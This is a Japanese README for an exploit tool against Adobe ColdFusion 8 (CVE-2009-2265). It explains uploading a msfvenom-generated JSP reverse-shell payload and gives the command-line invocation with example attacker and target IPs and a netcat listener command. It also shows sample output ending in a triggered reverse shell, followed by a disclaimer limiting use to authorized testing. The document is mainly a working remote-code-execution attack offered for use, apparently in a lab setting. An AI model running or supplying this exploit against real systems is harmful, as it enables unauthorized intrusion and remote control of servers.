
Adobe ColdFusion 8 - リモートコマンド実行 (RCE)
このエクスプロイトは、Adobe ColdFusion 8の既知の脆弱性(CVE-2009-2265)を標的とします。悪意のあるJSPペイロードをアップロードしてリバースシェル接続を確立することで、リモートコマンド実行(RCE)を可能にします。
msfvenomを使用してJSPペイロードを自動生成します。このエクスプロイトを使用するには、以下が必要です:
./CVE-2009-2265 -l <LHOST> -p <LPORT> -r <RHOST> -q <RPORT>
-l <LHOST>: ローカル攻撃者のIP(例:10.10.16.5)。-p <LPORT>: リバースシェルのためのローカル攻撃者のポート(例:9001)。-r <RHOST>: リモートターゲットのIP(例:10.10.10.11)。-q <RPORT>: ColdFusionが動作しているリモートターゲットのポート(例:8500)。./CVE-2009-2265 -l 10.10.16.5 -p 9001 -r 10.10.10.11 -q 8500
攻撃者マシンでリスナーを起動します:
nc -lnvp 9001
適切な引数でエクスプロイトを実行します。
実行されると、ペイロードがリスナーに接続して戻ります。
ペイロードの生成:
msfvenomを使用して悪意のあるJSPペイロードを生成します。ペイロードのアップロード:
ペイロードのトリガー:
リバースシェルの確立:
msfvenom。curl。nc(Netcat)。[+] Generating JSP reverse shell payload...
[+] Payload saved as 'abcd1234-5678-90ef-ghij-1234567890ab.jsp'.
[+] Uploading the payload to the target...
[+] Server response:
<script type="text/javascript">
window.parent.OnUploadCompleted(0, "/userfiles/file/abcd1234-5678-90ef-ghij-1234567890ab.jsp", "abcd1234-5678-90ef-ghij-1234567890ab.txt", "0");
</script>
[+] Waiting for the Netcat listener to start on port 9001...
[+] Netcat listener detected running on port 9001!
[+] Attempting to trigger the payload...
[+] Payload triggered successfully. Check your listener for the reverse shell.
[+] Cleaning up local files...
[+] Done!
このスクリプトは教育目的のみです。所有しているシステム、またはテストする明示的な許可があるシステムでのみ使用してください。所有していないシステムでのこのエクスプロイトの無断使用は違法であり、非倫理的です。
[0xDTC]によって開発されました。